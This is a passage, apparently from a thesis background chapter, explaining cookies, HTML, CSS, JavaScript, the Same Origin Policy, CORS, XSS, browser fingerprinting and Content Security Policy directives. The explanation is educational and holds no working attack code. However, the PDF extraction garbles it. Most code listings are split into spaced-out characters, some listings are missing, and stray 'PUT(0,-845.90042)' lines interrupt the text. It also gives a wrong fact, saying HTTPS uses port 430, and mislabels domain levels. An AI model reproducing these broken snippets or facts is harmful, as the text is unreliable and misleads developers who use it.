Cookies are organized on a per-domain basis. Listing 2.1 below shows an example of a

cookie to be set for google.com and its subdomains.

s et -c oo ki e: J A R= ab cd ; e xp ir es =T hu , 2 1 -F e b- 20 19 1 4: 39 :3 1 GMT ;

p at h= / ; d om a in = .g o og le . co m ; H tt p On ly ; S ec ur e

Listing 2.1 – Example of a cookie to be set for google.com and its subdomains

A variety of information compose the cookie header. The cookie name is JAR and its value is

abcd. It expires on the 21st of February 2019. After this period, the browser will no longer

attach this cookie to requests. The part domain=.google.com means that the cookie will

be attached to requests to google.com domain and also its subdomains (Section 2discusses

domains and subdomains). The flag HttpOnly instructs the browser that the cookie must

only be attached to HTTP requests, and not exposed to scripts running in webpages from

google.com and its subdomains. The Secure flag means that cookies must be attached to

HTTPS requests only, and not to insecure HTTP requests.

1.3 Web documents

Web applications are composed of a set of web documents typically written according to the

HyperText Markup Language (HTML) standard [70]. In its current status, the standard is

known as HTML5. Web documents are also usually referred to as HTML documents, pages

or webpages. HTML is a markup language and elements that compose the structure of a

webpage are described with HTML tags. The specification defines among other things, the

semantics of the different tags, the attributes that can be added to the tags (or elements),

and the ability to nest tags in order to create more and more complex webpages. Tags

are typically used in a pair of markups, in particular when the tag can nest other tags or

contain text: the start (opening) tag which contains the attributes, and the end (closing)

tag specifying where the tag declaration stops. Otherwise, when the tag does not accept

any nested tag or text, the closing tag is usually omitted. Nested elements are called the

children, and the nesting element is the parent.

PUT(0,-845.90042)

10 CHAPTER 2. BACKGROUND

< ht ml >

< he ad >

</head>

< bo dy >

</iframe>

</body>

</html>

Listing 2.2 – Example of an HTML document

Listing 2.2 shows an example of a simple HTML document. The html tag is the root

element of the document in which are nested the head and body elements. The title of the

page, declared with the title element is nested inside the head element. The latter also

nests a script and a link elements with different attributes src, rel, href and their

related values. In the body element is declared a ptag which indicates a paragraph in the

document, an img element which declares an image, and an iframe element than embeds

another web page in the first page.

To render a webpage (produce the user interface or UI), the browser parses it and produces

a Document Object Model (DOM) [48]. Then each portion of the document is rendered

according to its semantics as defined by the HTML standard. The rendering of some

elements may require the browser to make an HTTP request to fetch their content. This is

the case for instance, when the browser encounters a script, img, iframe element with

asrc attribute, or a link element with a href attribute. Many other elements (audio,

video, source, ...) may also require the browser to make HTTP requests in order to

render them.

In order to build rich web applications as we know today, HTML is usually further associ-

ated with other technologies.

1.4 Cascading Style Sheets (CSS)

The Cascading Style Sheets (CSS) [22] is widely used to describe the presentation (format-

ting and appearance) of HTML elements in a web document: for instance, the color, fonts,

size to use in order to display elements.

CSS files are included in web documents with the link tag (See Listing 2.2), or with the

style tag or even set with the style attribute of HTML elements.

@fo n t -f a ce {

font-family: " C us t om F on t " ;

s rc : u r l (" / f on t s / cu s to m fo n t . w of f2 " ) format(" w of f 2 ") ,

u rl ( " / fo n ts / c u st o mf o nt . w o ff " ) format(" w o ff " ) ;

}

div {

color:black;

font-family: " C us t om F on t " ;

f on t - s iz e : 14 px ;

background-image:url(http:/ / e xa m pl e . c om / b ac k g ro u nd . p ng ) ;

PUT(0,-845.90042)

1. WEB APPLICATIONS ECOSYSTEM 11

}

Listing 2.3 – Example of a stylesheet.

Listing 2.3 shows an example of a stylesheet. It loads a font (CustomFont) and applies it to

<div> elements. It also the defines the color, font size and background image of all <div>

elements.

1.5 JavaScript

JavaScript (JS) [50] is a prototype-based, multi-paradigm, dynamic scripting language,

losely-typed, interpreted or JIT-compiled programming language, supporting object-oriented

and imperative programming styles, with first-class functions and closures [80]. The lan-

guage defines different constructs such as literals, functions, objects, variables scopes, pro-

totype inheritance, etc. Functions in JavaScript are first-class because they can be assigned

as values to variables and objects, they can be passed as parameters to function calls and

returned as values of functions executions. Closures are inner-functions (a function defined

inside another function called the parent), which in particular can make use of variables

defined in the scope of the parent.

JavaScript dynamic features

JavaScript has many dynamic features. Unlike object-oriented languages such as Java

where objects are created out of classes using the new construct, objects in JavaScript can

be defined in many different other ways: object expressions, definitions via the Object

object. Functions can also be dynamically created with the Function object. Inheritance

a-la-JavaScript is a prototype-based inheritance. Any object can be the prototype of any

other object, and objects may have no prototype. When a property is not directly defined

in an object, the prototype chain is traversed in order to look it up.

One of the most dynamic features of JavaScript is undoubtedly the eval function. It takes

as an argument a string, turns it into a code and executes it. Likewise, functions such as

setTimeout, setInterval, Function also dynamically turn strings into code. We refer

to them as eval-like functions. They are among the most interesting but also the most

challenging features of JavaScript, when it comes to analyzing JavaScript programs [210,

240]. These functions pose a lot of security issues in JavaScript applications, as their use

can allow an attacker to execute arbitrary code in web applications.

The web programming language

JavaScript is the defacto programming language of the web, implemented by browsers and

extensively used in websites [153,229] to make HTML documents interactive. The script

tag serves to include scripts (JavaScript programs) in a webpage. JavaScript is also used by

non-browser environment such Node.js [105]. JavaScript programs manipulate webpages

thanks to the DOM API of the webpage that browsers expose to them. They can register

event listeners or callbacks (functions) that are invoked in reaction to events occurring in

the webpage (a mouse move, a user click on an element, a network event). The DOM is

accessible via the document object, which they can use to query for HTML elements in the

page, add, remove or change elements and their attributes. In the listing below, the text

of the first paragraph in the a webpage is changed to New paragraph text.

d oc u me n t. g et E le m en t sB yT ag N am e ( "p") [0 ]. i n ne r Te x t =" N ew p a ra g r ap h

text"

PUT(0,-845.90042)

12 CHAPTER 2. BACKGROUND

The document object is in reality a property of the global object window, whose properties

contain different information about a webpage and the browser in which it is rendered.

Different aliases are sometimes used to refer to the window object: this, self, global 3.

1.6 Browsing contexts

A browsing context is an execution environment where browsers load and render a web

document [19]. A browser tab or window corresponds to a browsing context. Tabs and

windows represent the User Interface (UI) of a webpage. Associated to a browsing context

are a set of resources and a common memory. In particular, scripts running in the context

of a page have access to all objects and data related to the context.

A webpage can be embedded into another webpage, using an HTML iframe (as shown

in Listing 2.2) or frame tag. The embedded document will be placed inside a different

browsing context, called a nested browsing context. The embedding document is called

the parent or top-level context, and the embedded document the child or nested context.

A browsing context that has no parent is called a top-level browsing context, others are

nested browsing contexts. An iframe can further embed another iframe and so forth,

causing different levels of nested browsing contexts [19]. Nested browsing contexts are

rendered in the UI of their parent context.

2 The Same Origin Policy

The Same Origin Policy (SOP) is a fundamental security mechanism implemented by web

browsers [125]. Among other things, it defines (i) the ability to include third party content

in webpages, (ii) the ability for a webpage to interact with third party servers in order to

load data, and (iii) the interactions between browsing contexts.

2.1 Origin

Browsers associate web applications and their resources (pages, files, content, data) to a

single origin. Resources that have the same origin are called same-origin resources, other-

wise they are considered cross-origin resources. An origin is usually made of 3 components

of a URL [144]: the scheme or protocol, the host or domain name and the port number.

Let us consider the URL https://user:pass@sub.host.com:8080/p/a/t/h?query=string#

hash. The host or domain name (sub.host.com) is the name of the machine (server) host-

ing the resource 4. A domain name is further divided into different parts or levels, with the

TLD (top-level domain) being the final component of the domain name. In our example,

com is the the top-level domain (TLD), host.com the second level domain (TLD+1). Third

and higher level domains are called sub domains (i.e. sub.host.com). Cookies for instance

are organized by hosts in browsers (See Section 1.2). The scheme is the communication

protocol used by browsers (clients) and servers to exchange data. In our example, https

is the scheme of the URL. Different communication protocols are associated to different

schemes (http for the HTTP protocol, https for the HTTPS protocol, ftp for the FTP

protocol, ...). Finally, the port is a unique number that identifies a network-based applica-

tion (an application that uses the network to communicate with different entities) running

on a machine. In our case, the network-based application is the web server which commu-

nicates with web browsers. By default, different protocols are associated to specific port

3. This depends on the context: this, self are exactly the global window ob ject if used outside of any

function, that is, the global scope [80]

4. This is later converted to an IP address

PUT(0,-845.90042)

2. THE SAME ORIGIN POLICY 13

numbers. The HTTP protocol is associated to the port 80 and the HTTPS protocol to

the port 430. Hence, a URL whose protocol is http but does not include a port number

is implicitly associated to the port number 80. URLs also contain additional information

such as the path to the resource being accessed, query strings or URL parameters which

are additional data passed to the URL, user credentials (user name and password), etc. A

web application or website is typically a collection of web resources which has a common

domain name.

Remote and inline content

Schemes can be grouped in two main categories: network and local schemes [54]. Network

schemes include HTTP(S) schemes (http, https), ftp, ws, wss and local schemes in-

clude about, blob, data, file, filesystem, javascript, among others. A resource

which is embedded in a webpage with a network-scheme URL, requires that the browser

connects to the server hosting the resource (using the communication protocol correspond-

ing to its scheme), in order to fetch the content of the resource. Local-scheme URLs or

URIs (Uniform Resource Identifiers) [143] on the other hand, are URLs which do not trig-

ger a network communication. The following listing shows the inclusion of a data URI

image in a webpage [45]

<img src=" d a ta : im ag e / p ng ;b a se 64 , iV B OR w 0K G go A AA

ANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAHElEQVQI12P4

//8/ w 38 GI AXD IB KE 0DH xg lj NBA AO 9T XL 0Y 4O Hw AA AA BJ RU

5 E rk J gg g= = " alt= " R ed d ot " />

The content of the image is wholly indicated in the URL. The browser just has to decode

and render it, and not make a connection to a remote server. We refer to content with

network-scheme URLs as remote or external content. In the case of JavaScript, we refer to

them as external libraries [153,229]. Otherwise, we refer to them as inline content, when

the URL scheme is a local-scheme.

It is worth noting the case of inline scripts, stylesheets and iframes, which can also be

declared without any URL. The <style> tag is used for declaring inline stylesheets. An

inline script is a script whose <script> tag does not have any src attribute. Its content

(code) is directly indicated between the start and end tag. Inline iframes can also be

created using JavaScript document.createElement, document.write APIs [10].

Also important is the srcdoc attribute introduced in HTML5 [203] for creating inline

iframes. The content of the iframe is directly indicated in the srcdoc attribute. Note that

the srcdoc attribute takes precedence on the src attribute, when both are specified on

an <iframe> element. Browsers supporting both attributes will ignore src in presence of

srcdoc [203].

2.2 Cross-origin embeddings

The Same Origin Policy defines rules regarding the inclusion (embedding) of cross-origin

resources in a webpage [125]. A cross-origin or third party resource is a resource whose

origin is different from that of the page in which it is embedded (say, a resource included

in a page using an HTML tag). If a page whose URL is http://example.com embeds a

script with the URL http://third.com/script.js, then the script is considered a third

party or cross-origin script. The page itself is usually referred to as the first party.

The SOP allows the inclusion of third party content in a webpage. This has many security

implications.

PUT(0,-845.90042)

14 CHAPTER 2. BACKGROUND

— Once loaded, a third party script will execute with the same privileges as first party

scripts. In other words, it can access and manipulate any data, object, the DOM and

any API exposed to the page, as if it was loaded from the page’s own origin.

— Cookies sent by the third party server in response to the request to fetch (load) the

third party resource, will be associated to the third party domain, and not to the first

party domain. That notwithstanding, third party scripts in particular can access the

first party cookies via JavaScript APIs such as document.cookie [49].

When the embedded resource is a cross-origin iframe, then the iframe is loaded inside a

cross-origin browsing context.

Interactions between browsing contexts

The Same Origin Policy also governs the interactions between different (nested) browsing

contexts. It allows a script in a browsing context to directly access other same-origin

contexts and their related data, DOMs, etc. For instance, a script in a page can access

and manipulate the DOM of an iframe from the same origin and vice versa. Similarly, two

same-origin iframes, embedded in a page, can directly access each other’s context.

Cross-origin interactions however are disallowed by the SOP. Nonetheless, it is worth men-

tioning the case of sub domains. When 2 cross-origins contexts differ only in their full

domain names, while having the same second-level (TLD+2) domain component, they can

relax their origins in order to enable direct interactions with each other’s browsing con-

text. Assume that the origins of the 2 cross-origins contexts are http://sub.host.com

and http://www.host.com. Since their common TLD+2 component is host.com then both

pages can execute

document.domain =" h os t .c om "

in order to become same-origin contexts, and directly access each other’s context. Now both

contexts are associated to the same origin http://host.com, allowing them to interact.

This is referred to as relaxing an origin. Note that even if the origin of one of the context

was already http://host.com, the context must also explicitly relax its origin to be able

to interact with sub domains which have relaxed their origins into http://host.com.

Cross-origin communications

If cross-origin browsing contexts do not have direct access to one another’s browsing con-

text, they can however communicate by exchanging messages. This also applies to same-

origin contexts. Message exchanges or message passing are achieved with the cross-origin

communication postMessageAPI [116]. Below is a listing showing how to use this API,

where message is the message or data to send, and origin is the origin of the contexts the

message is to be sent to.

p os t M es s ag e ( m es s ag e , o r ig i n )

Messages are dispatched on a per-origin basis. That is, all contexts whose origin matches

that of the origin parameter (the second parameter) will receive the message. To send

the message to all contexts, one can specify *as value for the origin parameter.

To receive messages, browsing contexts have to register listeners for events triggered by

incoming messages, as shown in the listing below.

addEventListener("message",function(e ve n t ){

message =event.data;

origin =event.origin

}) ;

PUT(0,-845.90042)

2. THE SAME ORIGIN POLICY 15

The messages sent cause the triggering of a message event in the destination contexts.

The message sent and the origin of the context that sent it, are accessible from the event

object, as shown in the listing above.

Sandboxing iframes

The HTML5 specification [70] introduced the sandbox attribute to be used with the <iframe>

tag.

Listing 2.4 – Sandboxing an iframe

The sandbox attribute, as shown in Listing 2.4, applies many restrictions on the nested

browsing context of the iframe, and has among other things, the effect of altering the

origin of the iframe context. Instead of http://example.com as an origin, as one may

expect, the iframe now has a different origin called a unique origin. The main property of

a unique origin is that it does not match any other origin, not even another unique origin.

Hence, a unique origin is considered a cross-origin compared to any other origin. The

SOP therefore disallows access from an origin to a unique origin context and vice versa.

Cross-origin communications can nonetheless be set up with unique origins.

The sandbox attribute also prevents the iframe from loading plugins, scripts, submitting

forms, displaying popups, navigating the top-level context, etc. Most of these default

restrictions can be relaxed by adding specific values (flags) to the attribute.

— The value allow-same-origin of the sandbox attribute gives back to the sandboxed

context, its expected origin. The iframe of Listing 2.4 would no longer be assigned a

unique origin, but rather http://example.com as expected.

— The value allow-scripts renables scripts execution inside the sandboxed context.

— The value allow-forms renables forms submissions.

It is worth mentioning the fact that, any context further nested inside a sandboxed iframe,

inherits the sandbox restrictions of its top-level contexts, in addition to the sandbox re-

strictions of the nested context itself. For instance, if scripts execution is not allowed in an

iframe, scripts execution is also not allowed in any context nested within the sandboxed

iframe.

2.3 Cross-origin reads

This refers to the ability of loading cross-origin data in the context of a web page. AJAX

(Asynchronous JavaScript + XML) [12] involves the use of various technologies that enable

scripts executing in a webpage, to connect to web servers in order to submit and fetch data

and update the user interface, without having to reload the page. In comparison, the use of

HTML forms [71] for sending and receiving information have the inconvenience of causing

webpages to reload.

AJAX requests are made using JavaScript objects such as XMLHttpRequest [155] or fetch [54].

Listing 2.5 shows a simple AJAX request made using the fetch API.

f et ch ( " h t tp : // h os t . co m / d at a " );

Listing 2.5 – Simple AJAX request using the fetch API

By default, the SOP does not allow cross-origin AJAX requests. Hence, a webpage from

an origin cannot use AJAX to fetch data on a web server of a different origin (cross-origin).

PUT(0,-845.90042)

16 CHAPTER 2. BACKGROUND

JSONP

One of the most used techniques to circumvent cross-origin reads is JSONP (JavaScript

Object Notation with Paddding) 5This hack relies on the fact the Same Origin Policy

does not prevent the inclusion of third party (cross-origin) scripts (See Section 2.2). To

load third party data with JSONP, one injects in the page a script whose URL parameters

include the name of a JavaScript function defined in the context of the page. This function

specifies how the data returned by the web server will be handled. The listing below shows

the inclusion of a script to load JSONP data. The URL is passed the parameter callback

whose value foo is the JavaScript function to be called to handle the data returned by the

server.

The third party server then generates a response which contains the name of the function

to which it passes the data as an argument, as shown in the following listing.

foo(cross-origin-data);

When the response is returned to the browser, the function foo will be invoked and the

data treated according to the definition of the function. The main limitation of JSONP

lies in the possibilities that it offers. Only the HTTP GET method is used for making

requests. Hence, data can only be submitted as parameters to the URLs. Compared to

AJAX requests, JSONP has way less possibilities. To enable cross-origin requests, the

Cross-Origin Resource Sharing (SOP) mechanism has been introduced.

3 Cross-Origin Resource Sharing (CORS)

Cross-Origin Resource Sharing (CORS) [34] is a refinement of the Same Origin Policy. It

involves the exchange of dedicated HTTP headers between web browsers and web servers,

in order for the latter to authorize (or not) cross-origin AJAX requests. Before CORS,

the SOP mandated that browsers block cross-origin requests. With CORS, the control is

given to web servers. In particular, the browser indicates to the target server, the origin

of the webpage making the cross-origin request. The server can then decide whether it

accepts requests from that origin (cross-origin requests). It is important to note here that

web servers have full control over accepting or rejecting CORS requests.

To work, CORS must be implemented both by the browsers and the web servers. However,

CORS is fully backwards compatible. Hence, if either browsers or web servers do not im-

plementing the mechanism, then browsers will fallback to the traditional SOP, by blocking

cross-origin requests 6.

3.1 Types of CORS requests: simple and preflighted

CORS is defined in the Fetch specification [55] and many online resources discuss how to

deploy and use it [33,127,148]. There are 2 types of CORS requests: simple and preflighted

5. The technique is named JSONP because it was mostly meant for loading data with the JSON format.

However, it can be used to load other types of data that can be handled by a JavaScript program such as

texts, numbers, XML, etc.

6. If the browser supports CORS, it will always attempt to make cross-origin requests. If web servers

respond with some CORS headers, it will enforce them, otherwise, it falls back to SOP. This may seem

inefficient in case the web server does not support CORS at all, because there is a round-trip request from

the browser to the server. This is because there is no HTTP headers for a web server to express that it

does not accept cross-origin requests for instance

PUT(0,-845.90042)

3. CROSS-ORIGIN RESOURCE SHARING (CORS) 17

requests. Preflighted requests require 2 requests in order to be fulfilled: first, the browser

makes a preflight request, then in a second time, makes the effective CORS request.

Simple CORS requests are those that basically have the same characteristics as HTTP

requests already possible with HTML forms [54]. Hence, in simple requests:

— only 3 HTTP methods are allowed: GET,POST and HEAD

— only a predefined set of HTTP headers can be used (Accept, Content-Language,

...). The type of data that can be transmitted in simple CORS requests, using the

Content-Type request header, can only be application/x-www-form-urlencoded,

multipart/form-data, and text/plain 7.

As an analogy, simple CORS requests can be understood as a way of submitting and

fetching HTML forms data without reloading a webpage.

As mentioned above, requests that are more elaborated than simple CORS requests are

preflighted CORS requests. This is the case when in the AJAX request, one uses an HTTP

method other than GET,POST and HEAD, or uses custom HTTP headers other than those

allowed in simple requests8

In order to fulfill preflighted requests, browsers actually make 2 sequential requests. A

first preflight request, made using the OPTIONS HTTP method, is sent to the cross-origin

server, to notify it about the characteristics of the preflighted requests that the webpage

is willing to make (i.e. the webpage wants to communicate using an HTTP method other

than GET,POST, or HEAD or it wants to send some custom HTTP headers). When the server

authorizes the preflight request (by responding with dedicated HTTP headers), then the

browser will send the effective CORS request, using the specific method and custom HTTP

headers.

Finally, by default, CORS requests are made without including the credentials (cookies

and authorization tokens) that may have been previously set by the server in the user

browser. However, webpages can instruct that CORS requests be made with credentials.

In this case, the browser will add the cross-origin server credentials to the CORS request.

Nonetheless, the server has here again full control and can accept or deny the request

with credentials. Note that requests with credentials are sensitive. If authorized by the

server, they allow a webpage from an origin to access potential user data on cross-origin

web applications.

3.2 CORS headers

Table 2.2 presents the different headers used for making CORS requests [40,55]. Intu-

itively, there is a one-to-one correspondence between each CORS request header sent by

the browser, and the dual used by the web server to respond in order to authorize or not

the cross-origin request.

Origin of the request First of all, the Origin request header is always added to cross-

origin requests. It tells the web server about the origin of the webpage from which the

cross-origin request is being made.

f et ch ( " h tt p : // t hi r d. c om " ) ;

Listing 2.6 – Simple CORS request without credentials, made using the fetch object

7. These are the possible data types for HTML forms

8. Using ReadableStream object or registering an event listener on an XMLHttpRequestUpload object

also triggers preflighted requests [33]

PUT(0,-845.90042)

18 CHAPTER 2. BACKGROUND

Request headers Response headers

Origin Access-Control-Allow-Origin

Access-Control-Request-Method Access-Control-Allow-Methods

Access-Control-Request-Header Access-Control-Allow-Headers

-Access-Control-Expose-Headers

-Access-Control-Mage-Age

Cookie, Authorization Access-Control-Allow-Credentials

Table 2.2 – CORS headers exchanges between web browsers and servers. In many cases,

there is a one-to-one correspondence between the requests and responses headers. The

browser sends a header, and the server uses its dual to authorize or reject cross-origin

requests

Consider the request in Listing 2.6. If it is made by a webpage whose URL is http:

//example.com:8080/home.htm, then the browser will add to the cross-origin request, the

header Origin and set its value to http://example.com:8080, which is the origin of the

webpage. The target web server (http://third.com) then knows the origin of the request.

If it accepts requests from pages with this origin, it can express this to the browser by using

the Access-Control-Allow-Origin response header. It has two possibilities as values for

the Access-Control-Allow-Origin headers: either *or the same value as that of the

Origin header (that is http://example.com:8080 in our example). In the second case,

the values of the Access-Control-Allow-Origin and the Origin headers match because

they have the same value. For the first case, *matches any origin. In either cases, the

cross-origin request is authorized by the server. Any other value returned by the server

for the Access-Control-Allow-Origin header, or the absence of this header would have

been interpreted by the browser as an unauthorized cross-origin request.

Custom HTTP headers and methods Consider the CORS request in Listing 2.7,

that makes use of the method PUT. This request is a preflighted request because of the

method PUT, which is not allowed in simple CORS requests.

f et ch ( " h t tp : / / t h i rd . c o m " , {

method: " P UT "

}) ;

Listing 2.7 – Preflighted request, because of the use of PUT method in the request

Therefore, a preflight request is first made. In addition to the Origin header, the browser

also adds the Access-Control-Request-Method header to the request. The value of this

header is the the PUT method, which tells the server about the method the client is willing to

use to make the cross-origin request. To authorize the use of this method, in addition to the

Access-Control-Allow-Origin header, the server adds the Access-Control-Allow-Methods

header in its response. The value of this header must be a comma-separated list of allowed

HTTP methods that include PUT as a value 9.

Similarly, the Access-Control-Request-Header is used in a preflight request to indicate

to the web server that the client would like to make a request with custom HTTP head-

ers. Listing 2.8 shows an example of a request that will be preflighted because the value

application/json of the Content-Type header is not allowed in simple CORS requests.

f et ch ( " h t tp : / / t h i rd . c o m " , {

9. The value of the header can be also be only the PUT method

PUT(0,-845.90042)

3. CROSS-ORIGIN RESOURCE SHARING (CORS) 19

method: " P OS T " ,

headers: {

"Content-Type":" a p pl i c at i on / j s on "

body : " . .. "

})

Listing 2.8 – Preflighted request, because application/json as a value for the

Content-Type header is not allowed in simple CORS requests.

In this case also, the browser makes a first preflight request. In addition to the Origin

header, it also adds the Access-Control-Request-Header header, with Content-Type as

its value. In case of multiple custom headers, the browser adds all of them as values to to the

Access-Control-Request-Header header, separating them with a comma. To authorize

requests with the custom headers, the server sends the Access-Control-Allow-Headers

header, whose value is a comma-separated list of headers, containing the headers sent in

the Access-Control-Request-Header. A custom header is allowed if it is listed in the

Access-Control-Allow-Headers header values.

Additional response headers can be added by the server in the responses to preflight re-

quests. The value of the Access-Control-Expose-Headers header is a list of response

headers that the server authorizes to be made visible by the browser to the webpage which

issued the request. The value of the Access-Control-Mage-Age header indicates a number

of seconds during which the response to the preflight request can be cached by the browser.

Till this delay expires, the browser is allowed to omit the first preflight request, for similar

preflighted requests to the same server.

After a successful preflight request, the browser makes the effective CORS request, with

the authorized methods and headers.

Requests with credentials By default, CORS requests are made without adding the

credentials of the cross-origin server to the requests. However, the webpage issuing the

request can explicitly instruct the browser to include the server’s credentials, as shown in

Listing 2.9.

f et ch ( " h t tp : / / t h i rd . c o m " , {

credentials: "include"

}) ;

Listing 2.9 – Making a CORS request with credentials, using the fetch API

In this case, the browser will add any credentials (cookies, authorization keys) previously

set by the web server in the user browser. To accept the request with credentials, the

web server returns the Access-Control-Allow-Credentials response header, setting its

value to true. It must also explicitly set the origin of the webpage as the value of the

Access-Control-Allow-Origin response header, and not use the *wildcard 10 . Otherwise,

the request fails.

3.3 CORS and sandboxing

It is worth mentioning the case of CORS requests made from sandboxed contexts (See

Section 2.2). In such contexts with unique origins, the value of the Origin header is set to

null by the browser in cross-origin requests. This makes it impossible for a web server (by

considering only the value of this Origin header) to know the real origin of the sandboxed

10. *matches any origin in the case of requests without credentials, but not requests with credentials

PUT(0,-845.90042)

20 CHAPTER 2. BACKGROUND

page from which a cross-origin request is being made. Hence, special care is to be taken by

the server, when considering cross-origin requests from unique origins. As the request may

be coming from any sandboxed context, one should not rely on the Origin header to allow

access to user data. For instance, one may not accept CORS with credentials from unique

origins without further information, such as the use of an additional token for example.

4 Security and privacy threats of third party content in web

applications

Thanks to powerful scripting capabilities rendered possible by JavaScript, webpages can be

made highly interactive and dynamic. Today’s web applications have nothing to envy of

traditional desktop applications in terms of features and performance, due to the constant

improvements in browsers and web technologies. Web applications collect, store and man-

age data provided by users. For instance, many web applications offer users the possibility

to provide their profile information (name, birth date, addresses, photos, credit card num-

bers...), which are stored by web servers, and used to later give access to different services

provided by the application. Web applications are also collaborative. For instance, a news

website can offer users the possibility to comment on articles and share their views with

other users.

The time is now long gone, when webpages were made of content originating solely from

the page’s own origin. Today, webpages embed various content from third parties. Such

pages are usually referred to as mashups, as they are built using content from different

third parties.

Attacks are widespread in the web [135], and web applications may contain vulnerabilities

that malicious users (attackers) can exploit to inject and execute malicious content (scripts)

in web applications. Third party content providers may also be malicious, or they can get

compromised by attackers, resulting in the injection and execution of malicious third party

content in web applications.

In this section, we describe security and privacy threats, both related to the presence of

third party content in web applications.

4.1 Cross-Site Scripting (XSS)

An XSS attack is a content (script) injection attack [41] in web applications that usually

involves a vulnerable website, the attacker or malicious user, and the victim user. Intu-

itively, the attack consists in injecting some malicious code in a vulnerable web page of a

website, so that it is executed in the browser of the victim user. Once injected, the ma-

licious code is indistinguishable from legitimate (benign) code executing in the context of

the page, as we have mentioned in Section 2.2. The malicious code gains the same power

as any code in the context of the page, allowing the attacker to steal user information

such as cookies, mount phishing attacks [112] (by making HTML forms that contain user

credentials point to a server under the control of the attacker), record sensitive information

provided by the user, etc. XSS is regularly ranked among the top 10 vulnerabilities in web

applications [135].

Types of XSS attacks

Three types of XSS attacks are usually admitted depending on the way they are con-

ducted [3]: persistent or stored, reflected and DOM-based XSS. DOM-based XSS is a

PUT(0,-845.90042)

4. THIRD PARTY CONTENT IN WEB APPLICATIONS 21

variant of both persistent and reflect XSS. In persistent and reflected XSS, the vulnerabil-

ity is in the server’s response, which fails at correctly sanitizing the inputs it receives from

the attacker, but outputs them as part of the response. In a DOM-based XSS however, the

vulnerability lies on the client-side code (JavaScript) manipulating the attacker-controlled

data without proper sanitization, leading to the execution of the attacker content as a

code [3].

4.2 Third party web tracking

Third party web tracking is the ability of a third party to recognize a user as she browses

the web and record her browsing history [225]. The more the websites which embed content

from a third party, the more precise is the browsing profile that the third party can build

about users visiting these websites. The main implication of such practices is a violation of

user privacy. In fact, the browsing profile can reveal sensitive information about a user: her

habits, political opinions, religious beliefs, sexual orientation, etc. Studies have shown that

third party tracking is often done with the purpose of web analytics, targeted advertisement

or other forms of personalization, and even user surveilliance [189].

Different techniques of third party tracking (or more precisely user recognition techniques)

have been demonstrated in the wild [188,217,225,242]. Mayer and Mitchell [225] grouped

them in two categories called stateful (cookie-based and super-cookies) and stateless

(fingerprinting) mechanisms. We illustrate a cookie-based tracking mechanism, and browser

fingerprinting below.

Cookie-based tracking

If a third party has its content included in many different webpages, then, each time a user

visits one of these pages, the request made to load the content tells the third party about

the webpage in which the content is embedded. Usually, browsers add the Referer header

to requests, setting its value to the URL of the page in which the content is embedded.

Therefore, to enable (cookie-based stateful) tracking, the third party can set a cookie in

the user’s browser, the first time a request is made to load content. Then, as browsers will

attach the cookie to subsequent requests to the same third party, (See Section 1.2), the

latter can combine the URL of the page and the cookie, to recognize the user and build

her browsing profile (all the pages the user has ever visited).

Browser fingerprinting

Browser or device fingerprinting is another tracking mechanism that was first demonstrated

by Eckersley [185], where the user identifier is her browser and its properties. In this sce-

nario, when the user first visits a website that embeds some content from a tracker, the

tracker does not store any stateful information (i.e., a cookie) in the user’s browser. It rather

collects different properties of the user’s browser, including for instance the user agent, i.e.

Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0

(which contains information such as the name, type, version, ... of the browser and the

OS on which it runs), the list of plugins, fonts, browser extensions installed in the user’s

browser, or the set of websites she is logged into. It then combines all these information to

build a unique fingerprint of the user browser. This fingerprint is stored on the tracker’s

server. Later on, when the user visits another website that also embeds some content from

the tracker, the tracker can recognize the user by once again collecting the properties of the

user browser, and comparing the current fingerprint with the set of user fingerprints it has

PUT(0,-845.90042)

22 CHAPTER 2. BACKGROUND

already collected. In case of a match, the tracker successfully recognizes the user behind

the browser. It is rather intuitive to convince ourselves about the effectiveness of a stateful

tracking, since it is based on unique identifiers that are set in users’ browsers. Many users

however, can have browsers with similar properties, and thus similar fingerprints as well.

Nonetheless, the efficacy of stateless mechanisms has been extensively demonstrated. Since

the pioneer work of Eckersley [185], new fingerprinting methods have been revealed in the

literature [163–165,173,180,188,230,259,263], able of uniquely identifying users with high

accuracy. In our study on browser extensions and Web logins fingerprinting (See Chap-

ter 7), we found that around 90% of Chrome browser users who have installed at least one

extension and are logged into at least one website, are uniquely identifiable.

5 Content Security Policy

The Content Security Policy (CSP) [258] is a W3C (World Wide Web Consortium) mech-

anism that allows programmers to control which resources can be loaded in a webpage.

In fact, the SOP allows the embedding of content from different origins, including from

third parties (See Section 2.2). CSP can be understood as a refinement of the Same Ori-

gin Policy, for further restricting the origins from which content can be loaded within a

webpage. Using CSP, a developer can explicitly whitelist the origins of content that are

trusted and can thus be loaded in webpages. Hence, once a webpage is rendered, browsers

would block any content not whitelisted in the CSP of the page. Such content may have

been injected by an attacker who exploited a vulnerability in the application. CSP is useful

as a defense-in-depth mechanism for mitigating the impact of content injection attacks in

general and Cross-Site Scripting (XSS) in particular [41]. As a first line of defense, devel-

opers are invited to properly sanitize content that they receive from users, before including

them in web pages either from the server side or from the client-side. Thereafter only, can

one deploy a CSP to further guard against the impact of these attacks.

Following the success of CSP version 1 (CSP1 [261]), the W3C has standardized the second

version of CSP (CSP2 [275]) and the next version (CSP3 [272]) is already in an advanced

development state. Many browsers implement CSP, and more and more websites deploy it

to protect their pages against attacks [162,177,255,267,269].

5.1 Directives

In order to whitelist content of different types, developers express CSP policies using direc-

tives to choose a type of content, and directive values to choose trusted origins [261,272,

275]. Table 2.3 shows the meaning of CSP directives. The list of CSP directives presented

here is not exhaustive, but comprises the majority of them. We have chosen to focus mostly

on directives used for restricting content inclusion in webpages.

Each directive targets a specific type of content, and can thus be used to restrict the origins

from which content of the particular type can load from. Directive script-src is the most

used feature of CSP in today’s web applications [267]. It specifies trusted origins where

scripts can be loaded from. The default-src is a directive used as a fallback for *-src

directives (directives which names end with -src). When default-src is present in a

policy, and any of the directives which fallback to it is not specified, then, the missing

directive implicitly inherit the restrictions (values) of default-src. The directive helps

for instance to apply the same restrictions on many directives at a time, without explicitly

specifying them. The sandbox directive is used to sandbox the webpage to which it applies,

as it the page was a sandboxed iframe (See Section 2.2).

PUT(0,-845.90042)

5. CONTENT SECURITY POLICY 23

Directive Description

script-src scripts execution with <script> tag, XSLT stylesheets,

JavaScript events listeners (onload, onclick) on HTML el-

ements

object-src embedded plugins (Flash, PDF, etc) with object, embed,

applet tags

plugin-types allowed types of plugins (application/pdf,

application/x-shockwave-flash) specified by the type

attribute of object, embed, applet tags

